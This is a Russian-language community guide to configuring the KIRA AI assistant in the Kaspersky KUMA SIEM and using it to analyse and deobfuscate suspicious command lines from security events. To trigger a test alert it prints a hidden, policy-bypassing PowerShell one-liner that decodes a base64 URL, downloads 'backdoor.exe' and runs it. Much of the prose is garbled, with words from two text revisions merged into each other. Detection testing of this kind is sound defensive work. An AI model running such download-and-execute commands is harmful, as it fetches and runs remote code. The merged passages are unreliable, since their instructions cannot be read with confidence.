Skip to main content

Настройка интеграции с KIRA и примеры использования

Информация, приведенная на данной странице, является разработкой команды pre-sales и/или community KUMA и НЕ является официальной рекомендацией вендора.

Официальная документация по данному разделу приведена в онлайн-справке на продукт: 
https://support.kaspersky.ru/kuma/4.0/294800

Видео по работе KIRA и преимуществаключевые - преимущества:
https://box.kaspersky.com/f/48a6de7a26044d9ea60c/ 

Kaspersky Investigation and& Response Assistant (далее — KIRA) — это облачный сервис на базе искусственного интеллекта для анализа событий информационной безопасности.

KIRA выполняет детальный разбор командных строк и скриптов Windows и Linux с возможностью деобфускации, формирует краткое описание их назначения и предоставляет аналитикаманалитическую инструментыинформацию, необходимую для оперативногоускорения декодированиярасследования инцидентов и деобфускации строк выполнения, извлечённых из событий безопасности в режиме реального времени. Данное решение оптимизирует процесс приоритизации инцидентов, сокращая время на анализ сложных данных, и снижает квалификационные требования для аналитиков первого уровня, что повышает общую эффективность системы реагирования на инциденты.алертов.

КлючевыеДля преимущества:использования сервиса ИИ KIRA необходимо:

  • УскорениеНаличие цикладействующей принятиялицензии решений;с модулем AI.
  • СнижениеНаличие зависимостифайла отсертификата высокойв экспертизыформате сотрудников;
PFX, Повышениезапакованного точностив ранжированияархив алертов.<имя заказчика>.ZIP, и пароля к сертификату для отправки запросов.

Для получения сертификата и пароля обратитесь к сотрудникам Лаборатории Касперского или представителям партнера.

    Наличие у пользователя одной из ролей: Главный администратор, Администратор, Аналитик 2-го уровня, Аналитик 1-го уровня, Младший аналитик. 

    Настройка интеграции KIRA доступна только пользователю с ролью Главный администратор.


    КакНастройка пользоватьсяинтеграции с KIRA

    Чтобы настроить интеграцию с KIRA:

      Перейдите в раздел Параметры Интеграции AI-сервисы. В открывшемся окне перейдите на вкладку Kaspersky Investigation & Response Assistant. Включите интеграцию с KIRA, установив переключатель Статус в активное положение. Нажмите Выбрать файл и загрузите архив <имя заказчика>.ZIP, в котором содержится сертификат в формате PFX. В поле Пароль от сертификата укажите пароль. Сервис KIRA отправляет запросы в облачный сервис, поэтому если в инфраструктуре используется прокси-сервер для доступа в Интернет выберите в раскрывающемся списке Прокси-сервер ранее созданный ресурс или создайте новый. В раскрывающемся списке выберите язык ответа на запрос в KIRA: русский или английский. KUMA будет передавать и хранить ответы KIRA на выбранном языке. Нажмите Сохранить. После того как вы нажмете Сохранить, вам будет предложено принять условия Лицензионного соглашения. Если вы не примете соглашение, сохранить параметры и продолжить работу с сервисом будет невозможно.

      image481.png

      После сохранения параметров будет показано доступное количество токенов. Количество токенов обновляется ежедневно.

      Интеграция с сервисом KIRA успешно настроена. Анализ будет доступен для всех событий, как новых, так и уже полученных.


      Выполнение анализа с помощью KIRA

      После того как интеграция настроена, можно выполнять анализ команд или скриптов с помощью KIRA.

      Для примера создадим новый алерт, но Вы также можете использовать события из сработкиуже сформированного алерта:

        Убедитесь, что правило R110_04_Сокрытие окна выполнения PowerShell скрипта привязано к коррелятору. Для этого:
          Перейдите в Ресурсы Активные сервисы Выберите сервис Коррелятора В окне Редактирование коррелятора перейдите на шаг Корреляция В поле Поиск введите «110_04» Убедитесь, что правило R110_04_Сокрытие окна выполнения PowerShell скрипта присутствует в списке. Если правило отсутствует в списке выполните привязку правила аналогично Статьям Создание правила корреляции типа Simple или Создание правила корреляции типа Standard.

          image482.png

            Убедитесь, что события Windows A new process has been created (Event ID 4688) поступают с тестовой рабочей станции. Для этого:
              Перейдите в раздел События. Укажите следующий поисковый запрос:
              SELECT * FROM `events` WHERE DeviceEventClassID = '4688' AND DeviceHostName = '<имя тестовой рабочей станции>'  ORDER BY Timestamp DESC LIMIT 250
                  Нажмите Выполнить запрос Убедитесь, что события A new process has been created отображаются в таблице событий. Если события A new process has been created отсутствуют в таблице событий выполните настройку сбора событий с EventID 4688 согласно Статье Настройка получения событий Windows.

                  image.png

                    На тестовой рабочей станции откройте консоль PowerShell и выполните следующую команду:

                     

                    powershell -NoProfile -NonInteractive -ExecutionPolicy Bypass -W Hidden -Command "$s = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2E3Mzk2ZDYxY2FmZmUxOGE0Y2ZmYmIzYjQyOGM5YjYwLmNvbS9kL2JhY2tkb29yLmV4ZQ==')); iwr $s -OutFile backdoor.exe; Start-Process .\backdoor.exe"
                      В веб-интерфейсе KUMA перейдите в раздел Алерты и убедитесь, что алерт R110_04_Сокрытие окна выполнения PowerShell скрипта появился в таблице алертов.

                      image483.png

                      Чтобы выполнить анализ:

                        Нажмите на название алерта воR110_04_Сокрытие всеокна еговыполнения PowerShell скрипта. В секции Связанные события по кнопкенажмите Найти в событиях. В открывшемся окне Расследование алерта откройте карточку базового или корреляционного события. Наведите на поле DeviceCustomString4, в котором содержится текст выполненного скрипта, и нажмите на символ image.png В раскрывающемся списке выберите Проанализировать с помощью KIRA.

                        image485.png

                        image.pngАльтернативный способ отправки запросов в KIRA: на панели инструментов в карточке события в раскрывающемся списке Проанализировать с помощью KIRA выберите поле, значение которого вы хотите проанализировать.

                        Далее,image486.png

                        либо
                          В открывшемся окне Проанализировать с KIRA отобразится команда для анализа. Обратите внимание, что base64 строка, содержащаяся в корреляционномскрипте, событии,была либоавтоматически деобфусцирована.

                          image487.png

                          Чтобы ознакомиться с отчетом об деобфускации нажмите Действия и выберите Посмотреть отчет по деобфускации.

                          image488.png

                            Если вы хотите предварительно определить количество токенов, которые будут затрачены на анализ, в базовомраскрывающемся списке Действия выберите Рассчитать размер в токенах. Количество токенов для анализа = количество токенов на интеремующемотправку полезапроса нажать+ количество токенов на "триответ. точки"

                            image489.png

                              Чтобы проанализировать команду, нажмите кнопку Проанализировать. Если токенов достаточно, запустится выполнение анализа и затемпоявится проанализировать:задача

                              image.png

                              Запрос в KIRA. Выполнение запроса может занимать от 30 секунд и дольше.

                              Возможность редактирования запроса перед отправкой в KIRA обеспечивает дополнительный уровень контроля над конфиденциальностью данных. Это особенно важно в случаях, когда анализируемые строки кода содержат чувствительную информацию, такую как персональные данные, учетные записи или ключи доступа.

                                Результат анализа доступен в том же окне Проанализировать с помощью KIRA: вывод, краткое содержание и развернутый анализ. 

                                image.pngimage490.png

                                ПоПосле кнопкевыполнения анализа результат будет отображаться в карточке события на вкладке ДействияАнализ KIRA и будет доступен для просмотра всем пользователям с доступом к функциональности Проанализировать с помощью KIRA

                                Результаты анализа KIRA хранятся в кэше в течение 14 дней.

                                image491.png

                                Также можно посмотретьпросмотреть отчетрезультат оанализа деобфускации:в разделе Диспетчер задач в свойствах задачи Запрос в KIRA. При нажатии на название задачи, в контекстном меню будут доступны следующие действия:

                                  Посмотреть результат - в этом случае любой пользователь с доступом к задачам KIRA может просмотреть результаты выполнения задачи из кэша и токены не будут потрачены. Перезапустить - в этом случае анализ будет выполнен без учета данных предыдущего анализа, хранящихся в кеше, и токены будут потрачены на выполнение анализа.

                                  image492.png

                                  image.pngПомимо отправки запросов в KIRA при расследовании алертов запросы можно отправлять непосредственно из раздела События.

                                  image493.png


                                  Примеры команд для анализа KIRA

                                  Команды не рабочиенерабочие все ссылки заменены, но это не отменяет перепроверку и аккуратность использованияиспользования!

                                  ссылкаСсылка на примеры - примеры:
                                  https://github.com/KUMA-Community/kuma_content/blob/main/kira/usecases.md